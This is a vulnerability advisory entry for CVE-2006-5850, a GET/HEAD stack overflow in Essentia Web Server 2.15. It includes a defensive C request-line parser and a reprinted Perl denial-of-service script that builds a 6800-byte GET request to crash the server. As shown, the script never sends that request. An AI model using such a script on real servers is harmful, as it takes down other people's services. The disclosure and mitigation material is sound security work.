Essentia Web Server GET and HEAD Request Remote Stack Overflow Vulnerability

Vulnerability ID: 1111468    Vulnerability type: Buffer overflow
Published: 2006-11-04    Updated: 2006-11-13
CVE ID: CVE-2006-5850    CNNVD-ID: CNNVD-200611-169
Affected platform: Windows    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/2716
https://cxsecurity.com/issue/WLB-2006110049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-169
|Vulnerability details
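Essentia Web Server is a multi-threaded HTTP server for Microsoft Windows, developed and maintained by Essen. Essentia Web Server has a buffer overflow vulnerability in its handling of user requests, which a remote attacker may exploit to execute arbitrary commands on the server. If an attacker sends the server an overly long (more than 6000 bytes) GET or HEAD request, a stack overflow is triggered, leading to arbitrary code execution.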
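A server-side mitigation for this class of bug, as an added example (not Essentia's code and not part of the advisory): a request-line parser that checks every length before copying into fixed-size buffers and rejects an over-long GET or HEAD line with 414. The function, struct and enum names and the 4096-byte limit are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not Essentia's code. All names and the 4096 limit are assumptions. */
#define MAX_REQUEST_LINE 4096

enum req_status { REQ_INCOMPLETE = 0, REQ_OK = 200, REQ_BAD = 400, REQ_TOO_LONG = 414 };

struct request_line {
    char method[8];
    char target[MAX_REQUEST_LINE];
};

/* Parse "METHOD SP target [SP version] CRLF" from the first len bytes of buf.
 * Nothing is copied until its length has been checked against the destination. */
enum req_status parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    /* Search for the end of line only inside the permitted window. */
    size_t window = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *eol = memchr(buf, '\n', window);
    if (eol == NULL)
        return len >= MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_INCOMPLETE;

    size_t line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r')
        line_len--;

    const char *sp1 = memchr(buf, ' ', line_len);
    if (sp1 == NULL)
        return REQ_BAD;
    size_t mlen = (size_t)(sp1 - buf);
    if (mlen == 0 || mlen >= sizeof out->method)
        return REQ_BAD;

    const char *target = sp1 + 1;
    size_t rest = line_len - mlen - 1;
    const char *sp2 = memchr(target, ' ', rest);
    size_t tlen = sp2 ? (size_t)(sp2 - target) : rest;
    if (tlen == 0)
        return REQ_BAD;

    /* tlen < MAX_REQUEST_LINE here because the whole line fit in the window. */
    memcpy(out->method, buf, mlen);
    out->method[mlen] = '\0';
    memcpy(out->target, target, tlen);
    out->target[tlen] = '\0';
    return REQ_OK;
}
```

A caller that receives REQ_TOO_LONG should answer 414 and close the connection instead of continuing to buffer input.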
|Exploit (EXP)
#!/usr/bin/perl

use IO::Socket;
use Getopt::Std; getopts('h:', \%args);

if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";
print STDERR "-=[ Discovered By CorryL          corryl80@gmail.com ]=-\n";
print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {
    print "usage: perl " . $0 . " -h HOST\n";
    exit();
}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 80,
                                Proto => 'tcp');
die unless $socket;

print "[+] Sending DOS byte\n";

$data = "GET /$dos \r\n\r\n";

# milw0rm.com [2006-11-04]
|References

Source: XF
Name: essentia-get-bo(30049)
Link: http://xforce.iss.net/xforce/xfdb/30049
Source: BID
Name: 20910
Link: http://www.securityfocus.com/bid/20910
Source: MILW0RM
Name: 2716
Link: http://www.milw0rm.com/exploits/2716
Source: VUPEN
Name: ADV-2006-4384
Link: http://www.frsirt.com/english/advisories/2006/4384
Source: SECUNIA
Name: 22718
Link: http://secunia.com/advisories/22718
Source: FULLDISC
Name: 20061104[x0n3-h4ck.org]EssentiaWebServer2.15BufferOverflow
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050537.html
Source: BUGTRAQ
Name: 20061112Re:[x0n3-h4ck]EssentiaWebServerv.2.15BufferOverflow
Link: http://www.securityfocus.com/archive/1/archive/1/451382/100/200/threaded
Source: BUGTRAQ
Name: 20061110[x0n3-h4ck]EssentiaWebServerv.2.15BufferOverflow
Link: http://www.securityfocus.com/archive/1/archive/1/451115/100/0/threaded
Source: SREASON
Name: 1846
Link: http://securityreason.com/securityalert/1846
Source: MILW0RM
Name: 2716
Link: http://milw0rm.com/exploits/2716